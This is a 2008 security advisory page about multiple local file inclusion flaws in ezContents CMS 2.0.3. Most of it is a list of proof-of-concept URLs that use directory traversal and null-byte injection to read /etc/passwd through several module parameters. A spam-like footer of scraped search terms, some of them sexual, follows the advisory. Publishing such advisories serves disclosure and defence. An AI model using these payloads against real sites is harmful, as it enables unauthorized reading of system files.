about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , ezContents CMS Multiple Local File Include Vulnerabilities


Title ezContents CMS Multiple Local File Include Vulnerabilities
Published 2008-08-25-12:00AM
Updated 2008-08-28-10:04PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  DSecRG
Vulnerable  VisualShapers ezContents 2.0.3
Not Vulnerable  
Code  Attackers can exploit these issues using a browser.The following proof-of-concept URIs are available:http://www.example.com/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG&gsLanguage=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG&language_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/news_summary.php?rootdp=DSecRG&admin_home=../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&nLink=../../../../../../../../../../../../../etc/passwd%00/
http://www.example.com/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG&gsLanguage=../../../../../../../../../../../../../etc/passwd%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 08:48:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cisci trisha t906t mambo Remo AMERICAN S miley cyru /search/ex t408t WWW.3PICS. rape scene Www.tamila t949t asian scho Coyote South+indi Searching Pics of ka phpBB WWW.nayant Wallpapers videos gra www89com+ components asian scho www.toysex phpBB por pic fat se dy.xfkyw.c free downl WWW.TOLLYW mambo Remo mambo Remo Network+As www.bbw.co exploit 20 Phonoretic http secur www.aishwa mambo Remo CMS is Fre Www.Sexy videosexyf 04-022 IceWarp We download s trishabath SEXYVIDEO mambo Remo Walpears.c Teachersse